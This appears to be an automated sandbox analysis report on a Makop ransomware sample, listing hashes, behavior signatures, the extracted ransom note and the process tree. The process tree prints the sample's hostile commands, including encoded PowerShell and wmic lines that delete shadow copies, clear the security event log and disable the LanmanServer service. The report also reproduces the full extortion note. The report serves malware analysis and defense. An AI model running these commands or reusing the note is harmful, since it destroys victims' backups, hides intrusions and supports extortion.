Analysis

  • max time kernel
    143s
  • max time network
    153s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-en-20220112
  • submitted
    06-03-2022 04:49

General

  • Target
    b8a08d9defaa5d802af843dc2cfdf8375c91e1f88db430263acf7a2d0931c13d.exe
  • Size
    244KB
  • MD5
    81fe203efa1ce2d19eb707e21f929871
  • SHA1
    8ae79ec18aabfa335c25efcae1e895c8e920b856
  • SHA256
    b8a08d9defaa5d802af843dc2cfdf8375c91e1f88db430263acf7a2d0931c13d
  • SHA512
    451dadeb19a8c88a1d4927803aeee34a3ce30a71d7740d86f8be7fab49a6042259532f94163a8c5a58f8555946e8c91129c5f21de056f8ba3f7ba9add0471241

Malware Config

Extracted

Path

C:\readme-warning.txt

Ransom Note
::: Greetings :::
Little FAQ:
.1. Q: Whats Happen? A: Your files have been encrypted and now have the "makop" extension. The file structure was not damaged, we did everything possible so that this could not happen.
.2. Q: How to recover files? A: If you wish to decrypt your files you will need to pay in 0.3bitcoins.
.3. Q: What about guarantees? A: Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will cooperate with us. Its not in our interests. To check the ability of returning files, you can send to us any 2 files with SIMPLE extensions(jpg,xls,doc, etc... not databases!) and low sizes(max 1 mb), we will decrypt them and send back to you. That is our guarantee.
.4. Q: How to contact with you? A: You can write us to our mailbox: [email protected]
.5. Q: How will the decryption process proceed after payment? A: After payment we will send to you our scanner-decoder program and detailed instructions for use. With this program you will be able to decrypt all your encrypted files.
.6. Q: If I don want to pay bad people like you? A: If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause only we have the private key. In practice - time is much more valuable than money.
:::BEWARE::: DON'T try to change encrypted files by yourself! If you will try to use any third party software for restoring your data or antivirus solutions - please make a backup for all encrypted files! Any changes in encrypted files may entail damage of the private key and, as result, the loss all data.

Signatures

  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Drops file in Windows directory 2 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utility to control services on the system.

  • Suspicious behavior: EnumeratesProcesses 14 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 30 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\b8a08d9defaa5d802af843dc2cfdf8375c91e1f88db430263acf7a2d0931c13d.exe
    "C:\Users\Admin\AppData\Local\Temp\b8a08d9defaa5d802af843dc2cfdf8375c91e1f88db430263acf7a2d0931c13d.exe"
    1⤵
    • Drops file in Windows directory
    • Suspicious use of WriteProcessMemory
    PID:2948
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -ep bypass -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AEMAbwBwAHkAfAAgAFIAZQBtAG8AdgBlAC0AVwBtAGkATwBiAGoAZQBjAHQA
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2476
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ep bypass -enc QwBsAGUAYQByAC0ASABpAHMAdABvAHIAeQA=
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3568
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ep bypass -enc QwBsAGUAYQByAC0ARQB2AGUAbgB0AGwAbwBnACAALQBMAG8AZwBOAGEAbQBlACAAcwBlAGMAdQByAGkAdAB5AA==
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3604
    • C:\Windows\SysWOW64\sc.exe
      sc config LanmanServer start= disabled
      2⤵
      PID:4012
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -ep bypass -e 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
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3808
    • C:\Windows\SysWOW64\sc.exe
      sc config LanmanServer start= disabled
      2⤵
      PID:3436
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ep bypass -enc QwBsAGUAYQByAC0ASABpAHMAdABvAHIAeQA=
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2316
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ep bypass -enc QwBsAGUAYQByAC0ARQB2AGUAbgB0AGwAbwBnACAALQBMAG8AZwBOAGEAbQBlACAAcwBlAGMAdQByAGkAdAB5AA==
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2148
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -ep bypass -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AEMAbwBwAHkAfAAgAFIAZQBtAG8AdgBlAC0AVwBtAGkATwBiAGoAZQBjAHQA
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2660
    • C:\Windows\SysWOW64\Wbem\wmic.exe
      wmic shadowcopy delete /nointeractive
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2104
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:1872
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:820

      Network

      MITRE ATT&CK Enterprise v6
